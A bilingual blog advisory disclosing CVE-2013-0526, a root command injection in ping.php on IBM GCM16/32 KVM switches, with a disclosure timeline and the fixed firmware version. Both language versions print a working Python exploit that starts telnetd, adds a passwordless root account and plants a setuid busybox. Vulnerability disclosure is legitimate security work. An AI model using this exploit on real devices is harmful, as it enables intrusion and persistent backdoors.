I. Descripción del producto

Los productos IBM 1754 GCM proporcionan KVM sobre IP y una tecnología de administración por consola serie en un único aparato.

II. Información de la vulnerabilidad
Impacto: Ejecución de comandos
Explotable remotamente: si
CVE: 2013-0526
CVE Score: 8.5

III. Detalles de la vulnerabilidad

Los dispositivos GCM16 (v.1.18.0.22011) y anteriores de este switch KVM contienen un fallo de seguridad que permite a un atacante remoto autenticado ejecutar comandos con privilegios de root.
El fallo existe porque las variables de la aplicación web no están correctamente parseadas. En este caso, los parametros $count y $size del fichero ping.php permiten realizar una petición POST especialmente diseña para que inserte comandos en una función exec() de php. Esto puede ser usado de forma arbitraria para ejecutar cualquier comando en el sistema operativo del KVM.


IV. Prueba de concepto

A continuación se detalla un exploit sencillo que abrirá un servidor telnet en el KVM y creará un usuario con permisos de root sin password. Se deben cambiar las variables sessid y target, ya que están hardcodeadas.



#!/usr/bin/python

"""
This exploit for Avocent KVM switch allows to gain root access to embedded device.
SessionId (avctSessionId) is neccesary for this to work, so you need a valid user. Default user is "Admin" with blank password.
After running exploit, connect using telnet to device with user target (pass: target) then do "/tmp/su - superb" to gain root
"""

from StringIO import StringIO
import pycurl
import re

sessid = "XXXXXXXXX"
target = "https://ip.of.kvm/ping.php"

command = "/sbin/telnetd ; echo superb::0:0:owned:/:/bin/sh >> /etc/passwd ; cp /bin/busybox /tmp/su ; chmod 6755 /tmp/su ; echo done. now connect to device using telnet with user target and pass target, then \"/tmp/su - superb\""

storage = StringIO()
c = pycurl.Curl()
c.setopt(c.URL, target)
c.setopt(c.SSL_VERIFYPEER,0)
c.setopt(c.SSL_VERIFYHOST,0)
c.setopt(c.WRITEFUNCTION,storage.write)
c.setopt(c.POSTFIELDS, 'address=255.255.255.255&action=ping&size=56&count=1 ; echo *E* ; ' + command + ' ; echo *E*')
c.setopt(c.COOKIE,'avctSessionId=' + sessid)

try:
    c.perform()
    c.close()
except:
    print ""

content = storage.getvalue()
x1 = re.search(r"\*E\*(.*)\*E\*",content)
print x1.group(1).replace("<br />","\n")


V. Respuesta del fabricante
IBM sacó un nuevo firmware que corrige esta vulnerabilidad (1.20.0.22575).

VI. Timeline
2013-06-12 - IBM PSIRT notificado.
2013-06-12 - IBM asigna ID interno.
2013-07-02 - IBM confirma la vulnerabilidad.
2013-08-16 - IBM hace público patch. La vulnerabilidad se expone publicamente.

VII. Informacion externa


Este es el advisory en ingles:

Asunto: CVE-2013-0526 IBM GCM16/32 Remote command execution.

I. Product description

The IBM 1754 GCM family provides KVM over IP and serial console management technology in a single appliance.

II. Vulnerability information

Impact: Command execution
Remotely exploitable: yes
CVE: 2013-0526

III. Vulnerability details

GCM16 (v.1.18.0.22011) and older versions of this KVM switch contain a flaw that allows a remote authenticated user to execute unauthorized commands as root.
This flaw exist because webapp variables are not sanitised. In this case, parameters $count and $size from ping.php allow to create a special crafted URL to inject text to an exec() so it can be arbitrary used to execute any command on the KVM embedded linux.

IV. Proof of concept

Following is a simple exploit that lead to root access to the device, opening a telnet and creating a new user with root permission without password (sessid and target are hardcoded so it must be changed to work):



#!/usr/bin/python

"""
This exploit for Avocent KVM switch allows to gain root access to embedded device.
SessionId (avctSessionId) is neccesary for this to work, so you need a valid user. Default user is "Admin" with blank password.
After running exploit, connect using telnet to device with user target (pass: target) then do "/tmp/su - superb" to gain root
"""

from StringIO import StringIO
import pycurl
import re

sessid = "XXXXXXXXX"
target = "https://ip.of.kvm/ping.php"

command = "/sbin/telnetd ; echo superb::0:0:owned:/:/bin/sh >> /etc/passwd ; cp /bin/busybox /tmp/su ; chmod 6755 /tmp/su ; echo done. now connect to device using telnet with user target and pass target, then \"/tmp/su - superb\""

storage = StringIO()
c = pycurl.Curl()
c.setopt(c.URL, target)
c.setopt(c.SSL_VERIFYPEER,0)
c.setopt(c.SSL_VERIFYHOST,0)
c.setopt(c.WRITEFUNCTION,storage.write)
c.setopt(c.POSTFIELDS, 'address=255.255.255.255&action=ping&size=56&count=1 ; echo *E* ; ' + command + ' ; echo *E*')
c.setopt(c.COOKIE,'avctSessionId=' + sessid)

try:
    c.perform()
    c.close()
except:
    print ""

content = storage.getvalue()
x1 = re.search(r"\*E\*(.*)\*E\*",content)
print x1.group(1).replace("<br />","\n")


V. Vendor Response
IBM released a new firmware that corrects this vulnerability (1.20.0.22575)
VI. Timeline
2013-06-12 - Vendor (IBM PSIRT) notified.
2013-06-12 - Vendor assigns internal ID.
2013-07-02 - Vendor confirms the vulnerability.
2013-08-16 - Vulnerability disclosed and patch released.

VII. External information

Information about this vulnerability (in spanish): http://www.bitcloud.es/2013/08/vulnerabilidad-en-kvms-gcm1632-de-ibm.html



0 comentarios:

Publicar un comentario en la entrada

Nube de Bits, 2011. Con la tecnología de Blogger.

Buscar en el blog

Cargando...